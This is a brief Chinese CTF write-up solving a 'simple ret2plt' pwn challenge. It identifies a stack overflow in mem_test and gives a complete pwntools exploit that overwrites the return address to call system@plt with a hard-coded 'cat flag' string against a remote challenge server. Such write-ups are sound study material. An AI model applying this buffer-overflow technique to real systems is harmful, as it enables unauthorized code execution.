简单的ret2plt
检查下防护,只开了NX。
放ida里:
问题出在mem_test函数里:
点开hint,发现了有"cat flag"这个字符串:
而且还在rodata区里,那直接硬编码就可以了。
程序本身调用了system函数,那直接ret2plt就行了。
根据ida计算出溢出点:
溢出点0x13+4。
编写exp:
from pwn import*
a=remote("pwn2.jarvisoj.com","9876")
system_plt=0x08048440
payload='A'*23+p32(system_plt)+p32(0x080485bd)+p32(0x080487E0)
a.recvuntil("> ")
a.sendline(payload)
a.interactive()
这道题返回地址随便写个无效地址会出现读不出来flag的问题,还是找个有效的地址,优雅的读取flag。。。